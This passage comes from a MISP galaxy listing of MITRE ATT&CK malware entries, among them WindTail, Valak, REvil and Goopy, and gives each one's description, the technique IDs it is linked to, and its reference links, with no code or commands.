[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)

The tag is: misp-galaxy:mitre-malware="WindTail - S0466"

WindTail - S0466 is also known as:

WindTail

View relationships graph

WindTail - S0466 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 5109. Table References
Links
https://attack.mitre.org/software/S0466
https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf
https://objective-see.com/blog/blog_0x3B.html
https://objective-see.com/blog/blog_0x3D.html

TajMahal - S0467

[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.(Citation: Kaspersky TajMahal April 2019)

The tag is: misp-galaxy:mitre-malware="TajMahal - S0467"

TajMahal - S0467 is also known as:

TajMahal

View relationships graph

TajMahal - S0467 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steal Web Session Cookie - T1539" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 5110. Table References
Links
https://attack.mitre.org/software/S0467
https://securelist.com/project-tajmahal/90240/

Turian - S0647

[Turian](https://attack.mitre.org/software/S0647) is a backdoor that has been used by [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://attack.mitre.org/software/S0647) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.(Citation: ESET BackdoorDiplomacy Jun 2021)

The tag is: misp-galaxy:mitre-malware="Turian - S0647"

Turian - S0647 is also known as:

Turian

View relationships graph

Turian - S0647 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

Table 5111. Table References
Links
https://attack.mitre.org/software/S0647
https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

Valak - S0476

[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)

The tag is: misp-galaxy:mitre-malware="Valak - S0476"

Valak - S0476 is also known as:

Valak

View relationships graph

Valak - S0476 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"

Table 5112. Table References
Links
https://attack.mitre.org/software/S0476
https://www.cybereason.com/blog/valak-more-than-meets-the-eye
https://unit42.paloaltonetworks.com/valak-evolution/

Bonadan - S0486

[Bonadan](https://attack.mitre.org/software/S0486) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://attack.mitre.org/software/S0486) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.(Citation: ESET ForSSHe December 2018)

The tag is: misp-galaxy:mitre-malware="Bonadan - S0486"

Bonadan - S0486 is also known as:

Bonadan

View relationships graph

Bonadan - S0486 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 5113. Table References
Links
https://attack.mitre.org/software/S0486
https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf

Skidmap - S0468

[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)

The tag is: misp-galaxy:mitre-malware="Skidmap - S0468"

Skidmap - S0468 is also known as:

Skidmap

View relationships graph

Skidmap - S0468 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pluggable Authentication Modules - T1556.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004" with estimative-language:likelihood-probability="almost-certain"

Table 5114. Table References
Links
https://attack.mitre.org/software/S0468
https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/

ABK - S0469

[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="ABK - S0469"

ABK - S0469 is also known as:

View relationships graph

ABK - S0469 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 5115. Table References
Links
https://attack.mitre.org/software/S0469
https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

SMOKEDHAM - S0649

[SMOKEDHAM](https://attack.mitre.org/software/S0649) is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)

The tag is: misp-galaxy:mitre-malware="SMOKEDHAM - S0649"

SMOKEDHAM - S0649 is also known as:

SMOKEDHAM

View relationships graph

SMOKEDHAM - S0649 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 5116. Table References
Links
https://attack.mitre.org/software/S0649
https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html
https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

REvil - S0496

[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)

The tag is: misp-galaxy:mitre-malware="REvil - S0496"

REvil - S0496 is also known as:

REvil
Sodin
Sodinokibi

View relationships graph

REvil - S0496 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Safe Mode Boot - T1562.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"

Table 5117. Table References
Links
https://attack.mitre.org/software/S0496
https://www.secureworks.com/research/revil-sodinokibi-ransomware
https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/
https://www.group-ib.com/whitepapers/ransomware-uncovered.html
https://securelist.com/sodin-ransomware/91473/
https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data
https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html
https://www.secureworks.com/blog/revil-the-gandcrab-connection
https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/
https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware
https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis

Goopy - S0477

[Goopy](https://attack.mitre.org/software/S0477) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050) and shares several similarities to another backdoor used by the group ([Denis](https://attack.mitre.org/software/S0354)). [Goopy](https://attack.mitre.org/software/S0477) is named for its impersonation of the legitimate Google Updater executable.(Citation: Cybereason Cobalt Kitty 2017)

The tag is: misp-galaxy:mitre-malware="Goopy - S0477"

Goopy - S0477 is also known as:

Goopy

View relationships graph

Goopy - S0477 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 5118. Table References
Links
https://attack.mitre.org/software/S0477
https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf

EventBot - S0478

[EventBot](https://attack.mitre.org/software/S0478) is an Android banking trojan and information stealer that abuses Android’s accessibility service to steal data from various applications.(Citation: Cybereason EventBot) [EventBot](https://attack.mitre.org/software/S0478) was designed to target over 200 different banking and financial applications, the majority of which are European bank and cryptocurrency exchange applications.(Citation: Cybereason EventBot)
